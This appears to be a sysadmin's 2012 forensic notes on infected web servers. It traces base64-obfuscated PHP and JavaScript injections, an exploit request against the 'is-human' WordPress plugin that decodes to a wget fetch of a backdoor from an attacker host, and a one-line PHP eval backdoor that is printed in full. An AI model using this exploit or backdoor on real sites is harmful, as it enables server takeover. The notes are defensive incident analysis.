Infected files start with a very long line:
<?php $str=base64_decode('ZXJyb3JfcmVwb3J0 [...] KfQ=='); ?>
which decodes to another php code, also with a base64 encoded string:
<?php echo(base64_decode('PHNjcmlwdD5oPS1wYXJzZUl [...] Y3JpcHQ+')); ?>
which decodes to an obfuscated JavaScript:
<script>h=-parseInt('012')/5 [...] n="3.5@3.5@51.5@50@15 [...] +q)</script>
which turns into some html code which tries to load http://mtyndtyudnzst6ymu87u.rr.nu/?go=2
According to another reports this kind of URLs lead to a "rogueware" site, today this particular domain is expired
This infection came from a backdoor installed in another virtual host in the same server
Logs in the http server show attacking site sending this:
GET /.../wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgaXNfaHVtYW5fY2xhc3MucGhwJyk7));error HTTP/1.1
which translates into:
passthru('wget http://troll.hr00.ru/sh.txt; mv sh.txt sh.php');
that means it tries to downlad a backdoor php code
This sample attack tries to exploit a vulnerable "is-human" wordpress plugin
Logs in the http server show attacking site sending this:
"GET /[random existing directory]/url(data:image/png;base64,iVBORw0KGgoA [...] RK5CYII%3d) HTTP/1.1"
This base64 code translates to this real image file:
Doesn't seem to be an exploit, but makes no sense to me.
-rw-r--r-- 1 webservd webservd 1026 Apr 2 08:18 ibqmfxq.php
After decoding twice base64, you get
if(isset($_REQUEST['a'.'sc']))eval(stripslashes($_REQUEST['a'.'sc'])/*M8K@\.*/);
That means, if you access your site as http://example.com/ibqmfxq.php?asc=[some string], you can execute code with webservd permissions.
In the server logs, you can see lots of accesses from different addresses to this backdoor, always using "POST" method, so you can't see the code actually executed.
Anyway logs show errors from this code: trying to remove files from /tmp, download files using wget/curl/fetch/lwp-download, using perl script "z"...
There is coincidence between last access to this backdoor and last mass infection of index.php files
This site was running Drupal 5.7 (a vulnerable 2008 version)
Infected html files with obfuscated javascript
<script>h=-parseInt('012')/5 [...] n="3.5@3.5@51.5@50@15 [...] +q)</script>
Last Modified: April 20, 2012